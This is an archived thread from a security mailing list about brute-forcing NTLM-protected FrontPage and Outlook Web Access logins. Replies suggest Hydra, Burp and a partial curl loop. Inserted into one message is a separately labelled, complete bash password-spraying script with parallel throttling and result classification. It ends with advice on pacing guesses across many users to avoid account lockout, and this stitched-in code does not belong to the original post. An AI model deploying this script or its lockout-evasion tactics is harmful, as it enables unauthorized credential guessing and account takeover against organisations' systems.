PaulDotCom mailing list archives

Re: hydra and HTTP NTLM


From: Sherif El-Deeb <archeldeeb () gmail com>
Date: Fri, 25 May 2012 23:59:34 +0300

Back when nothing supported Outlook Web Access brute-forcing, I wrote a
simple bash script that automated the process using "curl"... I suggest
you do the same.

"curl --ntlm" -> it will be two nested for loops: the outer iterates
through usernames, the inner iterates through passwords... then process
the server's answer using multiple grep and cut commands to check for
correct/bad credentials using variables and "if".

The only problem with that method will be the speed (lack of), so I have
included a simple function to make sure at least "32" instances of curl are
running at any given time.

===== start of code example=====
#!/bin/bash
.....
.....
# Block until fewer than 32 curl processes are running. (The original
# recursed here with no delay, which spins the CPU and grows the stack;
# a loop with a short sleep does the same job.)
CheckCurl(){
        while [ "$(pidof curl | wc -w)" -ge 32 ]; do
                sleep 0.1
        done
}

echo "[*] Starting..."
# "while read -r" rather than "for X in $(cat ...)" keeps usernames and
# passwords that contain spaces or glob characters intact.
while IFS= read -r USER
do
        while IFS= read -r PASSWORD
        do
# before running the command, we want to make sure that the running
# instances of curl are not greater than 32
                CheckCurl
# note that this will save the output to a folder called "html_out", change
# that or create it.
# Double quotes (not single) so that $USER and $PASSWORD expand; "\\" is a
# single backslash, so the argument becomes domain\USER:PASSWORD.
                curl --ntlm -u "domain\\$USER:$PASSWORD" blah blah blah blah ....... & # the ending ampersand is very important for multithreading
        done < "$passList"
done < "$userList"
wait # let the last batch of curl processes finish before the script exits

===== End of code example=====

Hope that helps,
Sherif Eldeeb.
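The same nested loop written out in full, as an added example that is not Sherif's script and not from the original post. It fills the placeholders with assumed values (the target URL, the NTLM domain and the two wordlist paths are taken as arguments), decides success from the HTTP status code curl reports with -w '%{http_code}' instead of grepping the response body, throttles on this shell's own background jobs (so unrelated curl processes on the box are not counted, unlike pidof), and sends OPTIONS, since that is the method Robin says provokes the 401 in his FrontPage case. The status-to-verdict mapping is an assumption stated in the comments.

```bash
#!/usr/bin/env bash
# Added example, not the original poster's script. Assumed inputs: target
# URL, NTLM domain, and two wordlists with one entry per line. Needs a curl
# built with NTLM support.
set -u

MAX_JOBS=32           # upper bound on concurrent curl processes
HTTP_METHOD=OPTIONS   # the method that triggered the 401 in the thread

# Block until fewer than MAX_JOBS background jobs of *this* shell are running.
throttle() {
    while [ "$(jobs -rp | wc -l)" -ge "$MAX_JOBS" ]; do
        sleep 0.1
    done
}

# Map the final status code of an NTLM-authenticated request to a verdict.
# Assumed mapping: IIS answers 401 to a rejected NTLM authenticate message;
# any 2xx/3xx means the credential was accepted (207 is WebDAV multi-status);
# 000 is what curl prints when no HTTP response arrived at all.
classify() {
    case "$1" in
        401)                     echo bad ;;
        2[0-9][0-9]|3[0-9][0-9]) echo ok ;;
        000)                     echo error ;;
        *)                       echo unknown ;;
    esac
}

# One attempt: prints "user<TAB>password<TAB>verdict<TAB>status".
# "\\" inside double quotes is a single backslash, giving DOMAIN\user:pass.
try_login() {
    local url="$1" domain="$2" user="$3" pass="$4" code
    code=$(curl -s -o /dev/null -w '%{http_code}' \
        --ntlm -u "$domain\\$user:$pass" -X "$HTTP_METHOD" "$url" </dev/null)
    printf '%s\t%s\t%s\t%s\n' "$user" "$pass" "$(classify "$code")" "$code"
}

# Outer loop over users, inner over passwords, at most MAX_JOBS curls at once.
# "while IFS= read -r" keeps entries with spaces or glob characters intact.
spray() {
    local url="$1" domain="$2" users="$3" passes="$4" user pass
    while IFS= read -r user; do
        while IFS= read -r pass; do
            throttle
            try_login "$url" "$domain" "$user" "$pass" &
        done < "$passes"
    done < "$users"
    wait   # collect the last batch before returning
}

# Usage: ./ntlm_spray.sh https://target.example/some/path CORP users.txt passwords.txt
# Prints only the attempts that were not rejected with 401.
if [ "$#" -eq 4 ]; then
    spray "$1" "$2" "$3" "$4" | awk -F'\t' '$3 != "bad"'
fi
```

Two things to keep in mind before pointing this at a real host: every NTLM attempt is a full negotiate/challenge/authenticate exchange, so each guess costs several round trips, and every rejected authenticate message counts against the account's lockout threshold on the domain controller, so iterate passwords slowly across many users rather than many passwords against one user.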

On Fri, May 25, 2012 at 11:10 PM, Robin Wood <robin () digininja org> wrote:

On 25 May 2012 16:59, Navarro, Gregory J <Gregory.J.Navarro () disney com>
wrote:
Do you know of a valid login but just not the password? If so, just fuzz
it with Burp.

I have no credentials, but even if I did I don't think Burp does NTLM;
for it to do it, it would have to be able to work with the four-way
handshake, and I've not seen anywhere that that appears to be an
option. If you can point me at how to do it I'll happily try.

Robin

From: listbounce () securityfocus com [mailto:listbounce () securityfocus com]
On Behalf Of Robin Wood
Sent: Thursday, May 24, 2012 6:08 AM
To: Tony Turner; PaulDotCom Security Weekly Mailing List
Cc: _; webappsec () securityfocus com
Subject: Re: [Pauldotcom] hydra and HTTP NTLM

On 24 May 2012 13:36, Tony Turner <tony_l_turner () yahoo com> wrote:
Have you tried http://www.foofus.net/~jmk/tools/FPbrute.pl yet? Or is
there a reason you wanted to use Hydra?

I've tried that, but it seems to expect the login request to be a simple
GET. I'm testing a FrontPage install which allows me to read but then
fails on write. Checking the traffic when I click save, it sends an
OPTIONS request which gets a reply of 401, which triggers FP to then
start the handshake.

Robin

________________________________
From: Robin Wood <robin () digininja org>
To: _ <packetnull () gmail com>
Cc: "webappsec () securityfocus com" <webappsec () securityfocus com>;
PaulDotCom
Mailing List <pauldotcom () mail pauldotcom com>
Sent: Thursday, May 24, 2012 8:17 AM
Subject: Re: [Pauldotcom] hydra and HTTP NTLM

On 24 May 2012 13:06, _ <packetnull () gmail com> wrote:
HTTP NTLM is IIS-based Windows auth.

Yes but I still don't know how to attack it.

Robin

On May 23, 2012, at 6:14 AM, Robin Wood <robin () digininja org> wrote:

Anyone know how to use the new HTTP NTLM feature in Hydra? I'm trying
to brute force a MS Front Page login which only asks for
authentication when the OPTIONS method is used as far as I can tell.

Robin



This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
